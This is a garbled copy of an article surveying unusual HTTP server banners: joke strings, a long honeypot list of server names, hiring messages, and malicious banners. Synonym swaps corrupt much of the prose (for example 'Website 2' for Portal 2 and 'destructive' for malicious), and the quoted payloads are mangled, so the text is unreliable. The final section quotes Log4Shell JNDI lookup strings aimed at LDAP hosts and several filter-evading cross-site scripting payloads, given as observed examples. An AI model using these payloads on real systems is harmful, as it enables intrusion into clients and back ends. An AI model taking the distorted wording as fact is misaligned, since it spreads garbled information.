Funny and malicious server banners

Amusing and destructive server banners

Netcraft’s newest Web Server Study consists of almost 1.2 billion sites. The majority of these websites return a server banner that reveals which web server software application they utilize, therefore permitting us to figure out the marketplace shares of each server supplier because 1995.

Much of these server banners are merely brief strings like “Apache”, while others might consist of extra information that expose which other software application– and which variations– are set up on the server. One such example is “Apache/2.2.32 (Unix) mod_ssl/ 2.2.32 OpenSSL/1.0.2 k-fips DAV/2 PHP/5.5.38”.

Chrome’s Network Inspector revealing the HTTP action headers for, which utilizes the nginx web server. It does not expose a variation number.

A web server exposes its server banner through the Server HTTP action header. This string is not normally exposed to users, however many web browsers enable it to be seen in the Network Inspector panel.

Custom-made banners

Web server software application normally enables its server banner to be customized. A typical factor for altering the default worth is to decrease the quantity of details that would be exposed to an aggressor.

For instance, if a web server promotes itself as running a susceptible variation of Apache, such as “Apache/2.4.49” it might be most likely to come under attack than a server that exposes just “Apache”.

Our Web Server Study consists of a couple of sites that return the following Server header, which takes an intentional swipe at the efficiency of concealing this sort of details:


Obviously, with this quantity of versatility, a saucy or destructive administrator can set up a web server to pretend to be anything they desire. Often this is carried out in an intentional effort to mask the reality or to deceive, while in others it might merely be done as a joke waiting to be discovered by anybody curious adequate to try to find the banner.

Unlikely server banners

Among the 1.2 billion sites, there are lots of examples of not likely server banners.

There are numerous web servers that declare to be working on a Commodore 64, however are more than most likely not.

And whilst it is possible for a web server to be powered by a potato, among the most popular examples that struck the news 22 years ago eventually ended up being a joke. Today, potentially in tribute to this trick, there are numerous hundred sites that return a “Server: Potato” action header.

Possibly to prevent any obscurities with a Debian circulation from the very same period called Potato, there are likewise lots of sites that declare to be working on “An actual potato with wires standing out of it”. A number of servers likewise declare to be running “GLaDoS PoTaTo”, which is a referral to the potato battery that powers the villain in the video game Website 2. All of the supposedly potato powered web servers insinuate that there is just one potato associated with the generation of electrical power (other examples consist of “A Single Potato” and “a potato”), with the only exception being a little number of servers that have actually embraced a greater tech technique with “somme potatoes connected together” [sic].

Screenshot of a potato-powered GLadDOS in Portal 2

Not a web server: An imaginary potato-powered computer system in the video game Website 2.

A handful of websites return the following server header, that includes an excessive variety of software application names and variations which are not likely in practice:

‘ 360 web server, 792/71644 HTTP Server variation 2.0 – TELDAT S.A., A10WS/1.00, ADB Broadband HTTP Server, ADH-Web, AR, ASUSTeK UPnP/1.0 MiniUPnPd/1.4, ATS/5.3.0, Adaptec ASM 1.1, AirTies/ASP 1.0 UPnP/1.0 miniupnpd/1.0, Allegro-Software-RomPager/4.06, AmirHossein Server v1.0, AnWeb/1.42 p, Android Web cam Server, AnyStor-E, Apache-Coyote/1.1, Apache/2.2.15 (CentOS), Apache/2.4.29 (Ubuntu), Apache/2.4.6 (Red Hat Business Linux) PHP/7.3.11, Apache/2.4.6 (Red Hat Business Linux) mod_jk/ 1.2.46 OpenSSL/1.0.2 k-fips, App-webs/, ArGoSoft Mail Server Pro for WinNT/2000/XP, Variation 1.8 (, AvigilonGateway/1.0 Microsoft-HTTPAPI/2.0, Avtech, Child Web Server, BigIP, BlueIris-HTTP/1.1, Boa/0.93.15, Boa/0.94.13, Boa/0.94.14 rc20, Boa/0.94.14 rc21, Boa/0.94.7, BolidXMLRPC/1.10 (Windows NT) ORION-BOLID v1.10, BroadWorks, Brovotech/2.0.0, CJServer/1.1, CPWS, CVM, Caddy, Webcam, Cambium HTTP Server, Electronic Camera Web Server, CentOS WebPanel: Safeguarded by Mod Security, Examine Point SVN structure, Cherokee/1.2.101 (Ubuntu), CherryPy/2.3.0, CherryPy/3.1.0 beta3 WSGI Server, CherryPy/8.1.2, CirCarLife Scada v4.2.3, Cirpark Scada v4.5.3-rc1, Cisco AWARE 2.0, Citrix Web PN Server, Commvault WebServer, Control4 Web Server, CouchDB/1.6.1 (Erlang OTP/18), CouchDB/1.6.1 (Erlang OTP/R16B03), CouchDB/2.0.0 (Erlang OTP/17), Cougar/, Cougar/, Cowboy, Cross Web Server, D-Link Web Server 0.01, DNVRS-Webs, DVR-HttpServer/1.0, DVRDVS-Webs, DWS, DasanNetwork Service, Debian/4.0 UPnP/1.0 miniupnpd/1.0, Deluxe Charm Workplace, Fate, DpmptspKarawangkab_HTTP_SERVER, E2EE Server 1.0, EBox, EShare Http Server/1.0, Easy-Web Server/1.0, Embedded HTTP Server., Embedded HTTPD v1.00, 1999( c) Delta Networks Inc., Embedthis-Appweb/3.2.3, Embedthis-Appweb/3.3.1, Embedthis-http, Delegate, Ericom Gain Access To Server, Ericom Gain access to Server x64, FN-Httpd 1.0 [HTTP/1.1], FUJITSU ServerView iRMC S4 Webserver, FileMakerPro/6.0 Fv4 WebCompanion/6.0 v3, Flussonic, GSHD/3.0, GeoHttpServer, GeoWebServer, Ginatex-HTTPServer, GlassFish Server Open Source Edition 4.0, GoAhead-Webs, GoAhead-Webs/2.5.0, GoAhead-http, GoTTY, H3C-Miniware-Webs, HFS 2.2 f, HFS 2.3 beta, HFS 2.3 e, HFS 2.3 i, HFS 2.3 k, HFS 2.3 m, HTTP Server, HTTP Server 1.0, HTTP Software Application 1.1, HTTPD, HTTPD Web Server, HTTPD-HR Server powered by Apache, HTTPD_gw 1.0, Hikvision-Webs, Hipcam, EnterpriseServer developed fo SMKN 1 Kaligondang, Http Server, Httpd, Httpd/1.0, Hydra/0.1.8, IBM_HTTP_Server, IIS, IP Cam Server, [email protected], IPCamera-Webs, IPCamera-Webs/2.5.0, IPCamera_Logo, IPOffice/, IceWarp/ x64, IceWarp/9.4.2, IdeaWebServer/0.83.292, If you desire understand, you can ask me, Indy/9.0.11, Intoto Http Server v1.0, InvalidPanda/1.0.0, JAWS/1.0, JAWS/1.0 Jan 21 2017, JBoss-EAP/7, JDVR/4.0, JFinal 4.5, JWS, Jetty( 6.1.19), KMS_ACCESS, Keil-EWEB/2.1, Kerio MailServer 6.5.2, Kestrel, LINUX-2.6 UPnP/1.0 MiniUPnPd/1.5, LTE Router Webs, Lanswitch – V100R003 HttpServer 1.1, Linux, HTTP/1.1, DIR-860L Ver 1.01, Linux/2.6.18 UPnP/1.0 miniupnpd/1.0, Linux/2. x UPnP/1.0 Avtech/1.0, Linux/3.10.0 eHomeMediaCenter/1.0, Linux/3.10.104 eHomeMediaCenter/1.0, Linux/3.10.33 UPnP/1.0 Teleal-Cling/1.0, Linux/3.14.29 CyberHTTP/1.0, Linux/3.4.39 UPnP/1.0 Cling/2.0, LiteSpeed, Lotus-Domino, MIPS LINUX/2.4 UPnP/1.0 miniupnpd/1.0, MJPG-Streamer/0.2, MS-SDK-HttpServer/1.0, MailEnable-HTTP/5.0, Mars, Mathopd/1.5 p6, Mbedthis-AppWeb/2.0.4, Mbedthis-Appweb/12.5.0, Mbedthis-Appweb/2.4.0, Mbedthis-Appweb/2.4.2, Microsoft-HTTPAPI/1.0, Microsoft-HTTPAPI/2.0, Microsoft-IIS/10.0, Microsoft-IIS/5.0, Microsoft-IIS/5.1, Microsoft-IIS/6.0, Microsoft-IIS/7.0, Microsoft-IIS/7.5, Microsoft-IIS/8.0, Microsoft-IIS/8.5, Microsoft-NetCore/2.0, UPnP/1.0 DLNADOC/1.50, Microsoft-WinCE/7.00, Mikrotik HttpProxy, Mini Embedded Web Server, Mini web server 1., Mini web server 1.0 ZTE corp 2005., Mini web server 1.0 ZXIC corp 2005., MiniServ/1.890, MistServer/2.14.2, MochiWeb/1.0 (Any of you quaids got a smint?), MonitorServer/ Python/2.7.5, Monitorix HTTP Server, Monkey, Mono-HTTPAPI/1.0, MoxaHttp/1.0, Mrvl-R1_0, Mrvl-R2_0, NISS, NVR EXT SERVER, NVR Webserver, Net-OS 5. xx UPnP/1.0, NetBox Variation 2.8 Construct 4128, NetEVI/3.10, Netwave IP Electronic Camera, Network Electronic Camera with Pan/Tilt, Network_Module/ 1.0 (WXA-50), Nexus/3.13.0 -01 (OSS), Nexus/3.9.0 -01 (OSS), Nginx, Nginx Microsoft-HTTPAPI/2.0, Nucleus/4.3 UPnP/1.0 Virata-EmWeb/R6 _ 2_0, OPNsense, OceanView-CDN, Oktell LS, OpenBCM/1.07 b3, OpenBSD httpd, Oracle Containers for J2EE, Oracle GlassFish Server, Oracle XML DB/Oracle Database, Oracle-Application-Server-10g/ Oracle-HTTP-Server, Oracle-Application-Server-11g, Oracle-HTTP-Server, Oracle-HTTP-Server-11g, Oracle_WebDb_Listener/ 2.1, PBX/63.0.2 (CentOS64), PRTG/, Pan/Tilt, PanWeb Server/ -, Payara Server 5.193 #badassfish, PrHTTPD Ver1.0, Proxy, Python/3.6 aiohttp/2.3.10, Qualvision -HTTPServer, Representative Server, RNOAAA018180026 HTTP Server variation 2.0 – TELDAT S.A., Bunny, RapidLogic/1.1, Raption v5.8.0, ReeCam IP Electronic Camera, RemotelyAnywhere/9.0.856, Reposify, Resin/2.1.12, Resin/3.0.17, Resin/3.1.8, Rex/12.0.7601.17514, RomPager/4.07 UPnP/1.0, RomPager/4.51 UPnP/1.0, Router, Router Webserver, SAP, SCADA, SQ-WEBCAM, SRS/3.0.45( OuXuli), SY8033, SY8045, Safe3 Web Firewall Program, Safedog/4.0.0, ScreenConnect/19.4.25542.7213 -2135886336 Microsoft-HTTPAPI/2.0, Serv-U/, Server, ServiceNow, Servlet 2.5; JBoss-5.0/ JBossWeb-2.1, Servlet/2.5 JSP/2.1, SimpleHTTP/0.6 Python/2.7.15+, SinforHttpd/1.0, SmartXFilter, SoftManager Application Server, SonicWALL, Glow, Start HTTP-Server/1.1, Sun GlassFish Business Server v2.1.1, Swift1.0, Change, SyncThru 5, TOPSEC, TP-LINK Router, TWebAP/, Tas, Techno Vision Security System Ver. 2.0, Tengine/2.3.2, Thecapital Caphe Websphere 12.3 develop 3.456.234.2600, This is webserver, TibetSystem Server 2.0, Tieline, Tntnet/2.1, Topsec, TornadoServer/6.0.2, TurnStat webserver, TwistedWeb/18.9.0, U S Software Application Web Server, UBNT Streaming Server v1.2, UCS PremieraExternal v4.0.4.24, UMC Webserver/5.0, UPnP/1.0 DLNADOC/1.50 Allwinnertech/0.1.0, UPnP/1.0 DLNADOC/1.50 Platinum/, Unidentified, Undefined, UPnP/1.0, Unspecified, VAppServer/6.0.0, VB, VB100, VCS-VideoJet-Webserver, VPON Server/1.0, Varnish, Vinahost, Virata-EmWeb/R6 _ 0_1, Virtual Web 0.9, Vivotek Network Electronic Camera, WAF, WCY_WEBServer/ 1.0, WCY_WEBServer/ 2.0, WDaemon/10.0.0, WDaemon/4.0, WEB SERVER, WMSServer/, WN/2.4.7, WS CDN Server, WSGIServer/0.2 CPython/3.7.3, WWW Server/1.1, WWW-Kodeks/6.4, Warp/3.2.27, Warp/3.2.28, Waveplus HTTPD, Web Express 0.9, Web Server, Web Change, Web server, Web-Server/3.0, WebServer, WebServer/1.0 UPnP/1.0, Webs, WebsServer/2.1.8 PeerSec-MatrixSSL/, Werkzeug/0.9.6 Python/2.7.6, WhatsUp, WhatsUp_Gold/ 8.0, WiJungle, WildDuck API, WildFly/10, WildFly/11, WildFly/8, WildFly/9, WindRiver-WebServer/4.7, WindWeb/1.0, Windows Server 2008 R2, UPnP/1.0 DLNADOC/1.50, Serviio/1.8, Wing FTP Server( Mario Kaserer), Wing FTP Server( MediaSend pty Ltd), Wing FTP Server/3.3.5(), Winstone Servlet Engine v0.9.10, Wisp/, WowzaStreamingEngine/4.7.1, WowzaStreamingEngine/4.7.7, XDaemon v1.0, XEvil_4.0.0[Beta][V4_0b25], Xavante 2.2.0 embeded, Xitami, Yawcam, YouTrack, YxlinkWAF, ZK Web Server, ZSWS/2.2, ZTE web server 1.0 ZTE corp 2015., Zope/( 2.13.15, python 2.7.3, linux2) ZServer/1.1, Zope/( 2.13.27, python 2.7.3, linux2) ZServer/1.1, Zscaler/5.7, abcd, access to tenda, alphapd, alphapd/2.1.7, alphapd/2.1.8, antid, axhttpd/1.4.0, axhttpd/1.5.3, beegoServer:1.12.0, bots-webserver, box, build-in http server, calibre 4.0.0, ccapi-dvrs-production, cisco-IOS, cloudflare, cloudflare-nginx, cvmd-1.0.0 (r1), dcs-lig-httpd, de475d6363d3b9295c4645cd08294af288c1c0de, eHTTP v2.0, eboo server, ingrained http dameon, falcon/2.1, foo, gSOAP/2.7, gen5th/1.33.00, gen5th/1.82.01, go1984, gunicorn/19.3.0, h2o/[email protected], http server 1.0, httpd, httpd/1.00, httpd/2.0, httpd_four-faith, httpserver, i-Catcher Console, iSpy, jjhttpd v0.1.0, kangle/, kong/0.14.0, libwww-perl-daemon/6.01, lighttpd, lighttpd-Intelbras, lighttpd/1.4.28, lighttpd/1.4.35, lighttpd/1.4.43, lighttpd/1.4.54, localhost, lwIP/1.4.0 (, mORMot (Windows) Microsoft-HTTPAPI/1.0, mORMot (Windows) Microsoft-HTTPAPI/2.0, micro_httpd, minhttpd, mini_httpd/ 1.19 19dec2003, mini_httpd/ 1.21 18oct2014, mini_httpd/ 1.30 26Oct2018, miniupnpd/1.0 UPnP/1.0, mysrv, nPerf/2.2.0 2019-04-02, nextgen_0.2, nginx, nginx/1.8.0, ngjit, nostromo 1.9.4, o2switch PowerBoost, openresty, item just, rchttpd/1.0, rednetcloud, scada, protected, siyou server, sky_router, squid, squid/3.1.18, staging, sthttpd/2.27.0 03oct2014, thttpd, thttpd-alphanetworks/2.23, thttpd/2.25 b 29dec2003, thttpd/2.25 b-lxc 29dec2003, thttpd/2.27 19Oct2015, tinyproxy/1.10.0, tsbox, uc-httpd 1.0.0, uc-httpd/1.0.0, waitress, web, web cam 7, webcamXP, webserver, webserver/1.0, wfe, wfust, wildix-http-server, wizzardo-http/0.1, yawcam’.

This sort of honeypot banner is a red herring for automated attack software application that is searching for susceptible sites to make use of.

We likewise see server banners being utilized to ask the most extensive concerns, such as:

Why do you Care?
Why look here?
Who would like to know that?
What are you taking a look at?
Do You Come Here typically?
Without sensation of regard, what exists to differentiate guys from monsters?
What is the air speed velocity of an unladen swallow?

Other strange server banners are utilized to communicate messages or stories. One such example is the site of a self-confessed computer system geek that returns the following prolonged server banner, which regales the story of Darth Plagueis, an imaginary character from the Star Wars franchise:

Did you ever hear the disaster of Darth Plagueis the Wise? I believed not. It’s not a story the Jedi would inform you. It’s a Sith legend. Darth Plagueis was a Dark Lord of the Sith, so effective therefore smart he might utilize the Force to affect the midichlorians to produce life He had such an understanding of the dark side that he might even keep the ones he appreciated from passing away. The dark side of the Force is a path to numerous capabilities some think about to be abnormal. He ended up being so effective the only thing he hesitated of was losing his power, which ultimately, naturally, he did. Sadly, he taught his apprentice whatever he understood, then his apprentice eliminated him in his sleep. Paradoxical. He might conserve others from death, however not himself.



There are numerous examples of sites concealing recruitment pitches in HTTP action headers, HTML remarks, JavaScript, and other locations that are just most likely to be observed by the curious. These methods are normally utilized to market tech task vacancies, where the technique of discovery increases the possibility of candidates having at least a few of the abilities or qualities needed to do the task well.

Some sites for that reason utilize the server banner to provide these messages, as it is an easy-to-configure location to put the message whilst still making it virtually undetectable to most of visitors.

Some examples of server banners being utilized for recruitment functions consist of:

Hiring/4.0 (https://[redacted] jobs/roles/digital-tech-data/).
Hey! We are working with!:-RRB- Send your CV to hr @[redacted] com with ‘Server’ topic.
We’re Working with Ninjas.

Destructive server banners

In the middle of the numerous examples of jokey server banners, there are some that explore murkier areas. Various sites return specifically crafted server banners that try to make use of security vulnerabilities in the customers that check out the websites, in back-end systems that consequently process the strings, or on web pages where the server banner is redisplayed.

A few of these server banners are created just to spot or show the existence of vulnerabilities in a benign style, whereas some are overtly destructive.

Log4shell exploits

A little number of sites in our most current Web Server Study effort to make use of the current Log4shell vulnerability in Log4j by setting server banners comparable to the following:

$ {jndi: ldap://.}
$ {jndi: ldap:// 7a1eng6l1rospa9ls03eipgqd.}

If among the LDAP URLs in these server banners gets any demands, the “aggressor” will understand the website providing the banner has actually been checked out by a bot or other kind of customer that eventually utilizes a susceptible variation of Log4j to log the string.

While these circumstances are presently benign and might well be done simply out of interest or in a genuine effort to declare bug bounties, they are however efficient in identifying susceptible customers or back-ends and the payloads might be turned destructive at any time.

Cross-site scripting

There are numerous sites with server banners that consist of cross-site scripting (XSS) payloads, a few of which are specifically crafted in an effort to bypass filters. Here are numerous examples:

<< script>> alert(‘ Im Seeing You!’)<. b"><> < h1>> e<< script>> alert(‘ benc’);<. << script>> alert(‘ XSS’)<. << script src=// 0d. al><> .
<< script>> alert(” HACKED!”);<. << script>> alert( 1 )<. "><> < script src=""><> jaVasCript:”/ *’/ *’/ *”/ *<

Leave a Comment

Your email address will not be published.